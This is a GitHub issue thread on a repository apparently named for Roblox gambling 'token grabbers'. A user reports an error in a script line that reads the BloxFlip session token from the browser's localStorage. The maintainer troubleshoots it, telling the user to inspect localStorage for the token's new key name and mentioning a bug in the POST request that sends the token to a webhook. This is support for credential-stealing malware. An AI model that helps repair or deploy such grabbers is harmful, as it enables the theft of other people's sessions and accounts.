### ISSUE TITLE
Error

### ISSUE THREAD

**Issue by Gamesciencea** [9ggy/Roblox-Gambling-Token-Grabbers#2]
It Says That Error is Not Defined at line 4 const token = window.localStorage["_DO_NOT_SHARE_BLOXFLIP_TOKEN"];
Please Help Me

**Comment by 9ggy** [comment]
They may have changed their storage method, or just the location. I'll look into this when i have some free time.

**Comment by 9ggy** [comment]
You can look yourself by pasting this in the console:

```javascript
window.localStorage
```

and inspecting the object that has been returned to you. If tokens are still being stored in open local storage, you should find the new alias. <3

**Comment by 9ggy** [comment]
So it seems the code is working properly then. Let me go test this out one more time :skull:

**Comment by 9ggy** [comment]
Are you sure you are running the script while logged in? also while testing I may have found a weird little bug that has to do with the POST request to the supplied webhook link.
